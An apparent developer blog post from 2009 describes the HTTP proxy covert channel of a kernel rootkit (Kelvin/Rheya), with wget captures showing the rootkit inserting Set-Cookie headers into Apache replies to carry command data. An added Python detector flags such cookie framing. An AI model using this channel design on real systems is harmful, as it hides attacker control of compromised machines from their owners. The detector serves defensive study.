I implemented the HTTP channel and the HTTP proxy feature.
Let me give you an example of how the proxy feature works:
First, we open a connection in kelvin to the http channel (the details don't interest us here).
I also activate the http proxy option ("proxy_on").
To illustrate the standard behaviour, let's send an HTTP request to the HTTP server of the rootkited box (192.168.3.2):
dobin@unreal ~ $ export http_proxy="localhost:8080"
dobin@unreal ~ $ wget -O - --no-cookies -S http://192.168.3.2:/index.html | cat
--2009-04-24 19:33:56-- http://192.168.3.2/index.html
Resolving localhost... 127.0.0.1, ::1
Connecting to localhost|127.0.0.1|:8080... connected.
Proxy request sent, awaiting response...
HTTP/1.1 200 OK
Date: Fri, 24 Apr 2009 15:33:55 GMT
Server: Apache/2.2.11 (FreeBSD) mod_ssl/2.2.11 OpenSSL/0.9.7e-p1 DAV/2
Last-Modified: Fri, 17 Apr 2009 22:58:53 GMT
ETag: "5c220-2c-467c81fe40540"
Accept-Ranges: bytes
Content-Length: 44
Connection: close
Content-Type: text/html
Length: 44 [text/html]
Saving to: `STDOUT'
100%[========================================>] 44 --.-K/s in 0s
2009-04-24 19:33:56 (15.4 MB/s) - `-' saved [44/44]
<html><body><h1>It works!</h1></body></html>

As you can see, wget retrieves index.html from the standard Apache installation, with cookies disabled, and prints the HTTP header and HTML source code to stdout. It uses our local rheya proxy (localhost:8080). No cookies are sent or received, as this is just a normal .html file.
Now, we want to call the "test" method in Kelvin. The "test" command just transfers 100 bytes of data to rheya, and expects 100 bytes in return in the reply.
Kelvin creates the solyaris request and waits (blocks) to receive a suitable HTTP request. Nothing has been sent for this command so far.
We generate the HTTP traffic with the same wget command as earlier:
dobin@unreal ~ $ wget -O - --no-cookies -S http://192.168.3.2:/index.html?ABCD | cat
--2009-04-24 19:37:24-- http://192.168.3.2/index.html?ABCD
Resolving localhost... 127.0.0.1, ::1
Connecting to localhost|127.0.0.1|:8080... connected.
Proxy request sent, awaiting response...
HTTP/1.1 200 OK
Date: Fri, 24 Apr 2009 15:37:23 GMT
Server: Apache/2.2.11 (FreeBSD) mod_ssl/2.2.11 OpenSSL/0.9.7e-p1 DAV/2
Last-Modified: Fri, 17 Apr 2009 22:58:53 GMT
ETag: "5c220-2c-467c81fe40540"
Accept-Ranges: bytes
Content-Length: 44
Connection: close
Content-Type: text/html
Set-Cookie: statusCode=1; requestID=0; dataLen=100; data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
Length: 44 [text/html]
Saving to: `STDOUT'
100%[========================================>] 44 --.-K/s in 0s
2009-04-24 19:37:24 (17.0 MB/s) - `-' saved [44/44]
<html><body><h1>It works!</h1></body></html>

The only difference between this wget request and the one earlier is the "Set-Cookie:" line.
What happened?
As you can see, rheya replied with a "Set-Cookie" line, which is the answer to our solyaris request. The line was inserted in the kernel, after Apache created its reply (the standard page doesn't include any cookies, of course).
The reason it inserted the "Set-Cookie" line is that Kelvin intercepted the HTTP request from wget in its proxy and transparently added a "Cookie:" line whose content is the solyaris request it generated.
In addition to wget, Kelvin also interpreted the HTTP reply and found the answer to its rheya "test" request:
This is just a PoC. There are a lot of rough edges, which will be cleaned up in the next few weeks.
Of course, instead of wget, one can also use a normal browser like Firefox, or even a web site crawler, to automate the transfer of data to and from the rootkit.
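The Set-Cookie line in the captured reply is exactly the kind of out-of-place header a monitoring proxy or IDS can spot: a static page that sets no cookies suddenly carries one, and the cookie describes its own payload length. The following detector is an added example for this post, not code from the Kelvin/Rheya project; the sample responses, the field names it keys on (statusCode, requestID, dataLen, data, as shown in the output above) and the 64-byte length threshold are constructed, and the same parser also works on the Cookie header of the request direction.

```python
from typing import Dict, List

# Constructed sample: the headers of the reply captured above (as wget -S printed
# them), including the Set-Cookie line the rootkit inserted into Apache's response.
RESPONSE_WITH_CHANNEL = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: statusCode=1; requestID=0; dataLen=100; data=" + "A" * 100 + ";\r\n"
    "\r\n"
)

# Constructed sample: an ordinary session cookie, for comparison.
RESPONSE_BENIGN = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: PHPSESSID=abc123def456; path=/; HttpOnly\r\n"
    "\r\n"
)

# Field names of the channel's reply framing, as seen in the captured output.
CHANNEL_KEYS = {"statusCode", "requestID", "dataLen", "data"}
MAX_COOKIE_VALUE = 64  # constructed threshold; tune to the site's real cookies


def parse_cookie_headers(raw: str, header: str = "Set-Cookie") -> List[Dict[str, str]]:
    """Return each <header> line (Set-Cookie in a reply, Cookie in a request) as a dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    cookies = []
    for line in head.split("\r\n")[1:]:  # skip the status / request line
        name, _, value = line.partition(":")
        if name.strip().lower() != header.lower():
            continue
        pairs = {}
        for part in filter(None, (p.strip() for p in value.split(";"))):
            k, _, v = part.partition("=")
            pairs[k.strip()] = v.strip()
        cookies.append(pairs)
    return cookies


def suspicious_cookies(raw: str, header: str = "Set-Cookie") -> List[str]:
    """Reasons why the cookie headers of an HTTP message look like a data channel."""
    reasons = []
    for cookie in parse_cookie_headers(raw, header):
        if CHANNEL_KEYS.issubset(cookie):
            reasons.append("cookie carries the statusCode/requestID/dataLen/data framing")
        # A cookie that declares its own payload length is framing, not application state.
        if cookie.get("dataLen", "").isdigit() and len(cookie.get("data", "")) == int(cookie["dataLen"]):
            reasons.append("dataLen matches the length of the data field")
        reasons += [f"{header} value {k!r} is {len(v)} bytes long"
                    for k, v in cookie.items() if len(v) > MAX_COOKIE_VALUE]
    return reasons
```

In practice the length threshold and the expected cookie names would come from a baseline of the site's legitimate responses, so that a cookie the application never sets stands out on its own.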